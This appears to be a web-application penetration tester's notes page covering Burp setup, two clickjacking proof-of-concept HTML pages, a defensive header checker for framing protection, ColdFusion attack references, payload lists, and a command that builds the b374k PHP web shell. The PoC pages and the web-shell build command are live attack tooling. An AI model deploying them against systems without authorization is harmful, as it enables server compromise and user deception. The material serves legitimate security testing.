Webapp Pentesting

Burp "Quick Start" guide

I did a video demo of how to get up and going with Burp quickly in episode #230 of the 7 Minute Security podcast. It includes things like:

  • Getting Burp installed
  • Installing the SSL cert
  • Installing FoxyProxy and proxying traffic through Burp
  • Setting up a quick shell script to start Burp from the command line:
    • java -Xmx2g -jar burpsuite.jar

Helpful extensions from the BApp store:

  • CO2 has a bunch of tricks up its sleeve - my favorite of which is helping you craft sqlmap commands with the right flags.

  • Reflector (I've not tested this one) claims to be able to find XSS in real time. It doesn't integrate directly with Burp via the BApp Store, but definitely looks to be worth checking out.

  • retire.js looks for old/outdated/vulnerable JavaScript libraries.

  • Software Vulnerability Scanner helps you find vulnerable software, such as old versions of IIS.

Clickjacking sample

Clickjacking

Here's a good page about clickjacking, and if you need to whip together a quick PoC for a client, I find this one works pretty well:

<html>
   <head>
     <title>Clickjack test page</title>
   </head>
   <body>
     <p>Website is vulnerable to clickjacking!</p>
     <iframe src="http://www.target.site" width="500" height="500"></iframe>
   </body>
</html>

As does this one:

<html>
  <head>
    <title>This is your totally safe corporate site...OR IS IT?!?!?!?!?!?</title>
    <style>
      body {
        position: relative;
        margin: 0;
      }

      iframe, div, a {
        border: none;
        position: absolute;
        width: 100%;
        height: 100%;
      }

      div {
        z-index: 100;
      }

      a {
        display: block;
      }
    </style>
  </head>
  <body>
    <iframe src="https://name-of-site-without-sameorigin-set-correctly.com">
    </iframe>
    <div>
      <a href="http://www.some-really-really-bad-site.com"></a>
    </div>
  </body>
</html>
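Both PoC pages above only work when the framed site sends nothing that stops cross-origin framing. The following is an added example (not from the original notes) that classifies a response's headers the way a browser would: a CSP frame-ancestors directive wins over X-Frame-Options, wildcards in frame-ancestors still allow any origin, and the obsolete ALLOW-FROM form is ignored. The sample responses are constructed, not captured from any real site.

```python
# Added example, not part of the original notes: decide from one HTTP response's
# headers whether a third-party page could frame it (the condition the two
# clickjacking PoC pages above depend on).
from typing import Dict, List, Optional, Tuple


def _frame_ancestors(csp: str) -> Optional[List[str]]:
    """Return the frame-ancestors source list (lowercased tokens), or None if absent."""
    for directive in csp.split(";"):
        tokens = directive.split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return [t.lower() for t in tokens[1:]]
    return None


def assess_framing(headers: Dict[str, str]) -> Tuple[bool, str]:
    """Return (frameable_by_third_party, reason) for a single response."""
    h = {k.lower(): v.strip() for k, v in headers.items()}  # header names are case-insensitive
    csp = h.get("content-security-policy")
    ancestors = _frame_ancestors(csp) if csp else None
    if ancestors is not None:
        # When frame-ancestors is present, browsers ignore X-Frame-Options entirely.
        if not ancestors or ancestors == ["'none'"]:  # an empty source list matches nothing
            return False, "CSP frame-ancestors 'none'"
        if any(t in ("*", "http:", "https:") for t in ancestors):
            return True, f"CSP frame-ancestors allows any origin: {' '.join(ancestors)}"
        return False, f"CSP frame-ancestors restricts framing to: {' '.join(ancestors)}"
    xfo = h.get("x-frame-options")
    if xfo is None:
        return True, "no X-Frame-Options and no CSP frame-ancestors"
    value = xfo.upper()
    if value in ("DENY", "SAMEORIGIN"):
        return False, f"X-Frame-Options: {value}"
    if value.startswith("ALLOW-FROM"):
        return True, "X-Frame-Options ALLOW-FROM is obsolete and ignored by current browsers"
    return True, f"unrecognised X-Frame-Options value is ignored: {xfo}"


# Constructed sample responses (not captured from any real site).
SAMPLE_RESPONSES = {
    "legacy-deny": {"X-Frame-Options": "DENY"},
    "csp-self": {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'self'"},
    "csp-overrides-xfo": {"X-Frame-Options": "DENY", "Content-Security-Policy": "frame-ancestors *"},
    "allow-from": {"x-frame-options": "ALLOW-FROM https://partner.example"},
    "unprotected": {"Content-Type": "text/html"},
}

if __name__ == "__main__":
    for name, hdrs in SAMPLE_RESPONSES.items():
        frameable, why = assess_framing(hdrs)
        print(f"{name:18} frameable={frameable!s:5} {why}")
```

Feed it the headers of the page you are about to drop into the iframe; if it returns True, the PoC will render, and the fix is a frame-ancestors directive or X-Frame-Options DENY/SAMEORIGIN on that response.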

ColdFusion

Sites that help with attacking CF:

  • https://jumpespjump.blogspot.com/2014/03/attacking-adobe-coldfusion.html
  • http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
  • https://www.exploit-db.com/exploits/14641/ (contains a path the CFIDE admin might live in)
  • https://github.com/averagesecurityguy/scripts/ - contains some scripts for attacking CF
  • https://dl.packetstormsecurity.net/papers/attack/topseven-coldfusion.pdf - top 5 CF vulns
  • https://www.cvedetails.com/vulnerability-list/vendor_id-53/product_id-8739/version_id-39015/Adobe-Coldfusion-7.0.html - CF 7 vulns
  • http://www.carnal0wnage.com/papers/LARES-ColdFusion.pdf - great paper from Chris Gates on attacking CF

Payloads

  • PayloadsAlltheThings is "a list of useful payloads and bypass for Web Application Security and Pentest/CTF."

  • XSS-Problems will "help you solve problems you might encounter while trying to XSS a target."

Web Shells

General guidance/usage

This blog gives some great guidance and a checklist for using/abusing Webshells.

The HighonCoffee cheat sheet is also awesome.

Webshells for download

B374K

One of my favorite web shells is b374k. As a quick reference, once you clone it from GitHub you can get a shell compiled pretty quickly with:

php -f index.php -- -o myShell.php -p MyPasswordGoesHere -s -b -z gzcompress -c 9

cmdsql

This nice webshell from NetSPI is handy for the following tasks (according to the web site):

  • Execute operating system commands
  • Parse web.config files for connection strings (based on root directory)
  • Execute MSSQL queries using connection strings recovered from web.config files

Note: the accompanying blog reminds us that this only works on IIS sites that allow execution of .aspx files.

Upload functionality (abusing)

This site has some great tips for abusing file upload functionality.

XSS

Nice site showing the risks of XSS.